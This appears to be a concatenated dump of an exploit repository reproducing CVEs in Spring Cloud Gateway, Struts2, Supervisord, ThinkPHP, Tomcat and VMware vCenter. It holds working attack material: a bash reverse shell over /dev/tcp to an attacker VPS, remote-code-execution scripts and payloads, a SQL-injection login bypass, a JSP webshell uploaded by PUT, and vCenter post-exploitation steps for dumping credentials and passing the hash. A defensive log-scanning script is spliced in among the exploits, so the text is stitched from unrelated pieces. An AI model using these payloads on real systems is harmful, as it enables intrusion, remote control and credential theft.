sys.argv[-2] 40 | if url[-1] == '/': 41 | url = url[:-1] 42 | 43 | cmd = sys.argv[-1] 44 | cmd = 'bash -c {echo,' + base64.b64encode(cmd.encode()).decode() + '}|{base64,-d}|{bash,-i}' 45 | if not (url.startswith('http://') or url.startswith('https://')): 46 | print('使用: python cve-2022-22947.py url cmd') 47 | sys.exit(1) 48 | 49 | rce(url, cmd) -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/01.png -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/image/02.png -------------------------------------------------------------------------------- /Spring/Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)/readme.md: -------------------------------------------------------------------------------- 1 | # 影响版本 2 | Spring Cloud Gateway 3 | 3.1.0 4 | 3.0.0 to 3.0.6 5 | Older, unsupported versions are also affected 6 | 7 | # 攻击环境 8 | 复现环境:https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947 9 | 复现版本:Spring Cloud Gateway 3.1.0 10 | 11 | # 攻击过程 12 | 环境搭建好以后,vps开启监听 13 | ![image](./image/01.png) 14 | 执行命令 15 | ``` 16 | python3.exe .\cve-2022-22947.py http://192.168.16.142:8080/ "bash -c 'exec bash -i &>/dev/tcp/xx.xx.xx.xx/1234 <&1'" 17 | ``` 18 | vps上成功收到反连 19 | ![image](./image/02.png) 20 | 21 | # 需要注意 22 | 一开始可以执行命令,过几分钟后会出现卡死状况 
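As an added defensive example that is not part of this repository, the following Python scans web-server access logs for the two request patterns that the SonicWall and Spring Cloud Gateway sections above depend on: a Shellshock-style `() { :; };` User-Agent sent to a CGI path such as /cgi-bin/jarrewrite.sh, and write requests to the /actuator/gateway/routes and /actuator/gateway/refresh endpoints, which should never be reachable without authentication (the CVE-2022-22947 fix is to upgrade and keep the gateway actuator off the network). The combined log format, the sample lines and the rule names are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in Apache/Nginx combined log format (not real traffic).
# Line 1 mirrors the SonicWall User-Agent shown in the readme above; lines 3-4 mirror
# the two POSTs made by cve-2022-22947.py; lines 2 and 5 are benign controls.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2021:10:01:02 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 512 "-" "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
10.0.0.6 - - [12/Jan/2021:10:01:05 +0000] "GET /cgi-bin/welcome HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Mar/2022:08:15:00 +0000] "POST /actuator/gateway/routes/ee HTTP/1.1" 201 0 "-" "Mozilla/5.0"
10.0.0.7 - - [03/Mar/2022:08:15:01 +0000] "POST /actuator/gateway/refresh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.8 - - [03/Mar/2022:08:16:00 +0000] "GET /actuator/health HTTP/1.1" 200 15 "-" "curl/7.68.0"
"""

# One combined-log line: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock marker: a bash function definition "() {" placed in a header value.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Spring Cloud Gateway actuator endpoints that add or reload routes.
GATEWAY_WRITE_RE = re.compile(r'^/actuator/gateway/(routes(/|$)|refresh$)')


@dataclass
class Finding:
    ip: str
    rule: str
    detail: str


def parse_line(line: str) -> Optional[dict]:
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> Optional[Finding]:
    """Apply the two detection rules to one parsed entry."""
    ua = entry["ua"]
    path = entry["path"].split("?", 1)[0]  # ignore the query string
    if SHELLSHOCK_RE.search(ua):
        return Finding(entry["ip"], "shellshock-user-agent", f"{path} UA={ua!r}")
    # Only state-changing methods matter; a GET of the route list is read-only.
    if entry["method"] in ("POST", "PUT", "DELETE") and GATEWAY_WRITE_RE.match(path):
        return Finding(entry["ip"], "gateway-actuator-write", f"{entry['method']} {path}")
    return None


def scan_log(text: str) -> List[Finding]:
    """Parse every line of an access log and collect the findings in order."""
    findings: List[Finding] = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        f = classify(entry)
        if f is not None:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ip:<10} {f.rule:<24} {f.detail}")
```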
--------------------------------------------------------------------------------
/Spring/Spring Core RCE 0day漏洞复现/readme.md:
--------------------------------------------------------------------------------
# 0x01-Environment setup
Using vulfocus, the open-source project from 白帽汇, at: https://github.com/fofapro/vulfocus

For docker pull and other issues see: https://github.com/ybdt/front-hub/tree/main/18-Docker

After setup it looks like this
![image](./pic/01.png)

# 0x02-Vulnerability reproduction
Project used: https://github.com/BobTheShoplifter/Spring4Shell-POC
```
git clone https://github.com/BobTheShoplifter/Spring4Shell-POC.git

python3.exe .\poc.py --url http://127.0.0.1:8080
```
Run the attack code, as shown below
![image](./pic/02.png)

Open it in the browser, as shown below
![image](./pic/03.png)
--------------------------------------------------------------------------------
/Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Struts2/Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)/readme.md:
--------------------------------------------------------------------------------
# 0x01 Initial discovery
A teammate compiled the addresses and fingerprints of all 7 of the target's OA systems, including 致远, 泛微 and others
Vulnerability checks on these 7 OA systems found no n-day vulnerabilities
A full-port nmap scan of the IPs hosting these 7 OA systems, reviewing each port in turn, found one port that accepted the PUT and DELETE methods, which looked suspicious; opening it in a browser showed a .action suffix, so a Struts2 vulnerability was suspected
# 0x02 Vulnerability verification
A Struts2 vulnerability scanner reported S2-045; attempting to execute a command returned "connection reset", which is probably a WAF
# 0x03 Protection bypass
There were two options: bypass the restriction on command execution, or upload a webshell; the relatively easier webshell upload was tried first
Uploading a .jsp webshell returned 403 on access
Uploading a .txt file could be accessed afterwards, so file upload works
Guess: the earlier 403 was because the target's web server restricts access to .jsp files

A series of attempts followed:
Uploading an .action file redirected to the home page
Arbitrary suffixes were not parsed
Uploading a .jspx webshell was accessible and 哥斯拉 connected successfully, as shown below
![image](./pic/1.png)

--------------------------------------------------------------------------------
/Struts2/Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)/s2-061-batch-detect.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

import sys
import requests
import platform
from bs4 import BeautifulSoup

# Normalise the URL format so that every URL ends with "/"
def correct_url(host_file):
    with open(host_file, "r") as f:
        hosts = f.readlines()
    correct_urls = []
    for host in hosts:
        if platform.system() == "Linux":
            host = host.strip("\n")
        if platform.system() == "Windows":
            host = host.strip("\r\n")
        if host.endswith("/"):
            correct_urls.append(host)
        else:
            correct_urls.append(host + "/")
    return correct_urls

# Use EXP1 from the reproduction write-up to check whether the vulnerability exists
def vuln_detect(url):
    payload = "?id=%25%7b+%27test%27+%2b+(2000+%2b+20).toString()%7d"
    full_url = url + payload
    try:
        r = requests.get(full_url)
        if "test2020" in r.text:
            return "True"
        else:
            return "False"
    except requests.exceptions.ConnectionError:
        return "connection error"
    except BaseException as e:
        return str(e)

def main():
    if len(sys.argv) == 2:
        host_file = sys.argv[1]
    else:
        print("Usage: below example is from ubuntu")
        print("Usage: python3 s2-061-batch-detect-exp.py hosts.txt")
        sys.exit()

    # Normalise the URL format so that every URL ends with "/"
    correct_urls = correct_url(host_file)

    with open("vulnerable.txt", "w") as f0:
        for url in correct_urls:
            result = vuln_detect(url)
            if result == "True":
                print(url + " is vulnerable")
                if platform.system() == "Linux":
                    f0.write(url + "\n")
                if platform.system() == "Windows":
                    f0.write(url + "\r\n")
            elif result == "False":
                print(url + " is not vulnerable")
            else:
                print(url + " " + result)
    print("The result has been output to the vulnerable.txt")

main()
--------------------------------------------------------------------------------
/Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/poc.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import xmlrpc.client
import sys


target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

--------------------------------------------------------------------------------
/Supervisord/Supervisord远程代码执行漏洞(CVE-2017-11610)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
Supervisord: a process manager written in Python

# 0x01 Reproduction environment
Environment used: the vulhub environment
Reproduced version: none

# 0x02 Environment setup
Target environment: kali_x64_en-us

cd vulhub/supervisor/CVE-2017-11610
docker-compose up -d

# 0x03 Exploitation requirements
None

# 0x04 Affected versions
Supervisor 3.3.2 (2017-06-03)
Supervisor 3.3.1 (2016-08-02)
Supervisor 3.3.0 (2016-05-14)
Supervisor 3.2.3 (2016-03-19)
Supervisor 3.2.2 (2016-03-04)
Supervisor 3.2.1 (2016-02-06)
Supervisor 3.2.0 (2015-11-30)
Supervisor 3.1.3 (2014-10-28)
Supervisor 3.1.2 (2014-09-07)

# 0x05 Vulnerability reproduction
Attack environment: kali_x64_en-us

python3 ./poc.py "http://172.17.0.1:9001/RPC2" "id"
As shown below
![image](./0.png)

# 0x06 Pitfalls
None

# 0x07 References
None

--------------------------------------------------------------------------------
/ThinkPHP/OneThink前台登录绕过.md:
--------------------------------------------------------------------------------
```
POST /admin/public/login.html HTTP/2
Host: xxx.com
Cookie: PHPSESSID=rj3bt9h5llepknii096h900ji4; onethink_admin___forward__=%2Fadmin%2Faddons%2Findex.html
Content-Length: 38
Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

username[]=like 1)and 1 in (2) union select 1,2,'',4,5,6,7,8,9,10,11%23&username[]=0&password=&verify=znjpu
```
--------------------------------------------------------------------------------
/ThinkPHP/ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
A development framework based on ThinkPHP, focused on back-office administration for the WeChat ecosystem

# 0x01 Reproduction environment
Environment used: locally built environment
Reproduced version: a v6 version from before 2020.08.03.1: https://github.com/179776823/ThinkAdmin

# 0x02 Environment setup
Target environment: 2008_r2_standard_zh-chs + phpstudy + https://github.com/179776823/ThinkAdmin

composer config -g repo.packagist composer https://mirrors.aliyun.com/composer #the Aliyun mirror is faster
https://github.com/179776823/ThinkAdmin #download the vulnerable v6 version into the corresponding phpstudy directory
cd ThinkAdmin
composer install
create database admin_v6;
create user 'admin_v6'@'localhost' identified by 'FbYBHcWKr2';#username and password come from config\database.php
grant all on admin_v6.* to 'admin_v6'@'localhost';
use admin_v6;
source C:\phpstudy_pro\WWW\ThinkAdmin-6\admin_v6.sql;#import the data into the database
Visit: http://127.0.0.1:81/ThinkAdmin-6/public/index.php
References:
https://mp.weixin.qq.com/s/MjU6u_eTsdH-nwQAgbxLRw
https://thinkadmin.top/install
https://www.cnblogs.com/Dot-Boy/archive/2008/08/04/1260185.html
https://www.jianshu.com/p/d7b9c468f20d
https://github.com/xuxuedong/personal-note/tree/master/2020_10_18_%E7%BD%91%E7%AB%99%E6%90%AD%E5%BB%BA%E4%BB%8E%E5%A4%B4%E8%AE%B0%E5%BD%95

# 0x03 Exploitation requirements
None

# 0x04 Affected versions
In the discoverer's own words: 2020.08.03.01, and any version ≤ this one may be vulnerable
Reference:
https://github.com/zoujingli/ThinkAdmin/issues/244

# 0x05 Vulnerability reproduction
Attack environment: Kali-Linux-2020.2-vmware-amd64 + Burp_Suite_Pro_v2020.5.1

Directory listing reproduction:
Visit: http://192.168.149.133:81/ThinkAdmin-6/public/index.php/admin/login.html
Capture the request in Burp and modify it as follows:
```
POST /ThinkAdmin-6/public/index.php/admin/login.html?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D
```
The directory is listed successfully, as shown below
![image](./0.png)

Arbitrary file read reproduction:
Create a file named 1.txt in the web root (C:\phpstudy_pro\WWW\ThinkAdmin-6\) with the content: lalala
From the attacker machine's browser visit: http://192.168.149.133:81/ThinkAdmin-6/public/index.php?s=admin/api.Update/get/encode/1d1a383c38
Here "1d1a383c38" is "1.txt" encoded by the following function
```
file_put_contents('test.php','')
```
Visit test.php and you can see that phpinfo has been loaded
![image](./0.png)

Arbitrary file inclusion reproduction:
Visit in the browser
```
?a=display&templateFile=README.md
```
README.md was included successfully
![image](./1.png)

# 0x06 Pitfalls
Pitfall 1:
During environment setup, step 3 failed with "thinkcmf 安装报错 Driver.class.php  LINE: 350"; after running "drop database thinkcmf" the reinstall succeeded, cause unknown

# 0x07 References
None

--------------------------------------------------------------------------------
/ThinkPHP/ThinkPHP 3.2.x远程代码执行/readme.md:
--------------------------------------------------------------------------------
# 0x01-Vulnerability analysis
The root cause of this vulnerability is that the business code passes a path carrying attack code as the first argument of the template assignment method assign, so the template path variable is overwritten with that path, which leads to file inclusion and then to code execution

# 0x02-Affected versions
To be tested

# 0x03-Environment setup
phpstudy8.1.1.3 + thinkphp3.2.3
Setup steps: https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ

# 0x04-Reproduction steps
```
GET /thinkphp-3.2.3/index.php?m=--> HTTP/1.1
```
![image](./image/01.png)
![image](./image/02.png)
```
GET /thinkphp-3.2.3/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_03_21.log HTTP/1.1
```
![image](./image/03.png)
![image](./image/04.png)

# 0x05-Notes
None
--------------------------------------------------------------------------------
/ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
ThinkPHP: a PHP development framework popular in China

# 0x01 Reproduction environment
Environment used: win10 x64
Reproduced version: ThinkPHP 5.0.22

# 0x02 Environment setup
Download thinkphp_5.0.22_with_extend.zip
Extract it and visit http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php

# 0x03 Exploitation requirements
None

# 0x04 Affected versions
ThinkPHP 5.0.0 ~ 5.0.23

# 0x05 Vulnerability reproduction
Attack environment: win10 x64

The attack payload is as follows:
```
http://127.0.0.1/thinkphp_5.0.22_with_extend/public/index.php?s=captcha

POST:

_method=__construct&filter[]=system&method=get&get[]=whoami
```
The result is shown below
![image](./0.png)

# 0x06 Batch script
None

# 0x07 Pitfalls
None

# 0x08 References
https://xz.aliyun.com/t/3845

--------------------------------------------------------------------------------
/ThinkPHP/ThinkPHP远程命令执行漏洞(暂无编号)/thinkphp版本总结.txt:
--------------------------------------------------------------------------------
As of 2021/01/03, excluding pre-release versions, all versions across the 5 series are:

thinkphp 6.0.0-6.0.5
thinkphp 5.1.0-5.1.40
thinkphp 5.0.0-5.0.24
thinkphp 3.2.0-3.2.5
thinkphp 3.1.0-3.1.3

--------------------------------------------------------------------------------
/Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Tomcat/Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)/readme.md:
--------------------------------------------------------------------------------
When the target is found to be a Tomcat application server with port 8009 or a similar port open, the Tomcat AJP file inclusion vulnerability can be tried

Tool used: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/

Run the command
```
python2 ./tool/CNVD-2020-10487-Tomcat-Ajp-lfi.py xx.xx.xx.xx -p 8443 -f WEB-INF/web.xml
```
Screenshot borrowed from the web
![image](./pic/1.png)

--------------------------------------------------------------------------------
/Tomcat/Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Software introduction
Tomcat: a popular Java web application server

# 0x01 Reproduction environment
Environment used: locally built environment
Reproduced version: Apache Tomcat 8.0.36

# 0x02 Environment setup
Target environment: win7_ult_x64_zh-chs

Download and extract apache-tomcat-8.0.36.zip
Download and install jdk-7u79-windows-x64.exe
Set the JAVA_HOME environment variable (one thing to note: even before setting JAVA_HOME you can run "java.exe -version" in cmd.exe, because the JDK installer automatically copies java.exe and related files into c:\windows\system32\)
Add the following to conf/server.xml
```

```
![image](./a0.png)
Then download catalina-jmx-remote.jar and groovy-2.3.9.jar and put them in Tomcat's lib directory
Note:
1. The catalina-jmx-remote.jar you download must match the Tomcat version; this jar is usually found in the extras folder of the official Tomcat download directory
2. Download Groovy, preferably version 2.3.9; the official site no longer offers it, so here is a download address: https://mvnrepository.com/artifact/org.codehaus.groovy/groovy/2.3.9
Next edit bin/catalina.bat and add the following above "Execute The Requested Command"
```
set CATALINA_OPTS=-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
```
-Dcom.sun.management.jmxremote.ssl=false specifies whether SSL is used for the connection
-Dcom.sun.management.jmxremote.authenticate=false specifies whether password authentication is required
![image](./a1.png)
Finally run bin/startup.bat to start Tomcat!
![image](./a2.png)
Check whether the target has started JmxRemoteLifecycleListener, i.e. whether it is listening on ports 10001 and 10002; on inspection, it has
![image](./a3.png)

# 0x03 Exploitation requirements
The target has started JmxRemoteLifecycleListener, i.e. it is listening on ports 10001 and 10002

# 0x04 Affected versions
Apache Tomcat 9.0.0.M1 to 9.0.0.M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0.RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47

# 0x05 Vulnerability reproduction
Attack environment: Kali-Linux-2020.2-vmware-amd64

Download ysoserial and run
```
java -cp ./ysoserial-master-6eca5bc740-1.jar ysoserial.exploit.RMIRegistryExploit 192.168.149.134 10001 Groovy1 calc.exe
```
The calculator pops up on the target machine
![image](./a4.png)

# 0x06 Pitfalls
Pitfall 1:
With the same Tomcat version under Java 1.8.0_131 the calculator would not pop up. I think this vulnerability also depends on the Java version, and on the Groovy version

# 0x07 References
https://blog.csdn.net/littlehaes/article/details/104451590
https://gv7.me/articles/2018/CVE-2016-8735/
https://github.com/frohoff/ysoserial
http://cn.voidcc.com/question/p-zmdzyjue-bbh.html

--------------------------------------------------------------------------------
/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/WebSocketClient.js:
--------------------------------------------------------------------------------
class WebSocketClient {

    constructor(protocol, hostname, port, endpoint) {

        this.webSocket = null;

        this.protocol = protocol;
        this.hostname = hostname;
        this.port = port;
        this.endpoint = endpoint;
    }

    getServerUrl() {
        return this.protocol + "://" + this.hostname + ":" + this.port + this.endpoint;
    }

    connect() {
        try {
            this.webSocket = new WebSocket(this.getServerUrl());

            //
            // Implement WebSocket event handlers!
            //
            this.webSocket.onopen = function(event) {
                console.log('onopen::' + JSON.stringify(event, null, 4));
            }

            this.webSocket.onmessage = function(event) {
                var msg = event.data;
                console.log('onmessage::' + JSON.stringify(msg, null, 4));
            }
            this.webSocket.onclose = function(event) {
                console.log('onclose::' + JSON.stringify(event, null, 4));
            }
            this.webSocket.onerror = function(event) {
                console.log('onerror::' + JSON.stringify(event, null, 4));
            }

        } catch (exception) {
            console.error(exception);
        }
    }

    getStatus() {
        return this.webSocket.readyState;
    }

    send(message) {

        if (this.webSocket.readyState == WebSocket.OPEN) {
            this.webSocket.send(message);

        } else {
            console.error('webSocket is not open. readyState=' + this.webSocket.readyState);
        }
    }

    disconnect() {
        if (this.webSocket.readyState == WebSocket.OPEN) {
            this.webSocket.close();

        } else {
            console.error('webSocket is not open. readyState=' + this.webSocket.readyState);
        }
    }
}

var client = new WebSocketClient('ws', '172.16.35.133', 8080, '/DemoOne/endpoint');

client.connect();

--------------------------------------------------------------------------------
/Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/WebSocketServlet.java:
--------------------------------------------------------------------------------
package com.pegaxchange.java.web;

import java.io.IOException;
import java.util.List;
import java.util.Map;

import javax.websocket.OnClose;
import javax.websocket.OnError;
import javax.websocket.OnMessage;
import javax.websocket.OnOpen;
import javax.websocket.Session;
import javax.websocket.server.ServerEndpoint;

@ServerEndpoint("/endpoint")
public class WebSocketServlet {

    @OnOpen
    public void onOpen(Session session) {
        System.out.println( "onOpen::" + session.getId() );
    }

    @OnClose
    public void onClose(Session session) {
        System.out.println( "onClose::" + session.getId() );
    }

    @OnMessage
    public void onMessage(String message, Session session) {
        System.out.println("onMessage::From=" + session.getId() + " Message=" + message);
        try {
            session.getBasicRemote().sendText("Hello Client " + session.getId() + "!");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @OnError
    public void onError(Throwable t) {
        System.out.println("onError::" + t.getMessage());
    }
}
-------------------------------------------------------------------------------- /Tomcat/Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)/readme.md: --------------------------------------------------------------------------------
# 0x00 Software overview
Tomcat: a popular Java web application server

# 0x01 Reproduction environment
Environment used: locally built environment
Version reproduced: apache-tomcat-8.5.56

# 0x02 Environment setup
Target system: 2008_r2_standard_zh-chs

Download and unpack apache-tomcat-8.5.56.
Enter the bin directory and run startup.bat; "Server startup in xx ms" normally means the server started successfully, as shown below
![image](./a.png)
Visit [http://172.16.35.133:8080/](http://172.16.35.133:8080/) to confirm the service is up, as shown below
![image](./b.png)
The following 8 steps are then required:
1. Install and configure the JDK
2. Install and configure Apache Tomcat
3. Install and configure Eclipse IDE for Java EE
4. Configure the Tomcat runtime in Eclipse IDE for Java EE
5. Create a dynamic web project in Eclipse
6. Create a "Hello World" Servlet and JSP view
7. Run the dynamic web project in Eclipse
8. Export it as a WAR file and deploy it to Tomcat
The finished WebSocket application is in WebSocketServlet.java; the deployed application is shown below
![image](./a0.png)
In the console of Firefox's developer tools, run the JavaScript from WebSocketClient.js statement by statement; once "client.connect();" has run and the Tomcat console in Eclipse prints "onOpen::0", the WebSocket application is deployed successfully, as shown below
![image](./a1.png)
Export it as DemoTwo.war and deploy it to Tomcat

# 0x03 Exploitation prerequisites
A WebSocket application is deployed on Tomcat

# 0x04 Affected versions
9.0.0.M1 <= apache tomcat <= 9.0.36
10.0.0-M1 <= apache tomcat <= 10.0.0-M6
8.5.0 <= apache tomcat <= 8.5.56
7.0.27 <= apache tomcat <= 7.0.104

# 0x05 Reproduction
Attacking system: Kali-Linux-2020.2-vmware-amd64

Reproduction against the self-written WebSocket application:
Run the following commands:
git clone https://github.com/RedTeamPentesting/CVE-2020-13935
cd CVE-2020-13935
go build
./tcdos ws://172.16.35.133:8080/DemoTwo/endpoint
After running them, the target's CPU jumps to 100%, as shown below
![image](./a2.png)
At that point the Tomcat manager console shows the following
![image](./a3.png)

Reproduction against Tomcat's bundled WebSocket examples:
First visit [http://172.16.35.133:8080/examples/websocket/](http://172.16.35.133:8080/examples/websocket/) to confirm a WebSocket application exists, as shown below
![image](./f.png)
Run the following command:
./tcdos ws://172.16.35.133:8080/examples/websocket/echoProgrammatic
After running it, the target's CPU jumps to 100%, as shown below
![image](./c.png)

# 0x06 Pitfalls
Pitfall 1:
After running go build, the following error may appear
![image](./d.png)
At that point a suitable means of Internet access is needed; after it succeeds the output looks like this
![image](./e.png)

# 0x07 References
https://www.anquanke.com/post/id/221861
https://github.com/RedTeamPentesting/CVE-2020-13935
https://www.pegaxchange.com/2018/01/28/websocket-server-java/
https://www.pegaxchange.com/2016/09/02/java-eclipse-tomcat/
https://www.cnblogs.com/xdp-gacl/p/5193279.html
https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/
-------------------------------------------------------------------------------- /Tomcat/Tomcat 
WebSocket拒绝服务漏洞(CVE-2020-13935)/tcdos: --------------------------------------------------------------------------------
-------------------------------------------------------------------------------- /Tomcat/Tomcat任意文件写入漏洞(CVE-2017-12615)/readme.md: --------------------------------------------------------------------------------
# 0x00 Reproduction environment
Environment used: https://www.mozhe.cn/bug/detail/120
Version reproduced: Tomcat 7.0.79

# 0x01 Environment setup
None

# 0x02 Exploitation prerequisites
Installed on Windows

# 0x03 Affected versions
7.0.0 <= Tomcat <= 7.0.79

# 0x04 Reproduction
Attacking environment: kali2020

Visit the target address, capture the request in Burp, and modify it as follows (the three request lines are the variants tried):
```
PUT /cmd.jsp// HTTP/1.1
PUT /cmd.jsp/ HTTP/1.1
PUT /cmd.jsp HTTP/1.1
Host: 219.153.49.228:45174
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 313

<%
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
%>
```
After Send, the response is as below; "HTTP/1.1 201 Created" means the file was created successfully
![image](./f0.png)
Visiting the URL http://219.153.49.228:45174/cmd.jsp?cmd=cat%20/key.txt then returns the output of the command
![image](./f1.png)

# 0x05 Pitfalls
None

# 0x06 References
None
-------------------------------------------------------------------------------- /VMWare/VMWare vCenter Server后利用/readme.md: --------------------------------------------------------------------------------
### 0x01-Checking the VMware vCenter version
```text
POST /sdk HTTP/2
Host: 172.18.2.62
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Te: trailers
Connection: close

<_this type="ServiceInstance">ServiceInstance
```

### 0x02-Checking the VMware ESXi version
```text
POST /sdk HTTP/1.1
Host: 10.10.15.4
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Te: trailers
Connection: close

<_this type="ServiceInstance">ServiceInstance
```

### 0x03-From arbitrary file read to backend login
```text
Linux
/storage/db/vmware-vmdir/data.mdb

Windows
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

Example
https://10.8.12.170/eam/vib?id=C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

Extract the cookie with vcenter_saml_login

Replace the cookie and log in to the backend
```

### 0x04-From exploitation to backend login
```text
Exploit a vulnerability to get a shell

Extract the cookie with vcenter_saml_login

Replace the cookie and log in to the backend
```

### 0x05-From backend login to taking over virtual machines
```text
Use vCenter's snapshot feature to take a snapshot of the virtual machine, then dump credentials from it with memory-forensics techniques and pass the hash;

Alternatively, download it locally and restore it as a virtual machine, then boot a PE environment and rename CMD.EXE to OSK.exe, overwriting the original OSK.exe; after booting, opening the on-screen keyboard pops up a SYSTEM-privileged command prompt, from which a local CS beacon can be started and hashdump used to grab credentials, then pass the hash. (by banliz1)
```

### References
https://github.com/pen4uin/pentest-note/blob/main/README.md#内网-vsphere--vcenter的后利用姿势
https://github.com/horizon3ai/vcenter_saml_login
-------------------------------------------------------------------------------- /VMWare/VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)/Sp4ce/CVE-2021-21972/README.md: --------------------------------------------------------------------------------
# CVE-2021-21972
CVE-2021-21972


# Works On

- VMware-VCSA-all-6.7.0-8217866, VMware-VIM-all-6.7.0-8217866 ✔
- VMware-VCSA-all-6.5.0-16613358 ✔

# For vCenter 6.7 U2+
vCenter 6.7 U2+ runs the web application from memory, so this exploit does not work on 6.7 U2+.

# Need test

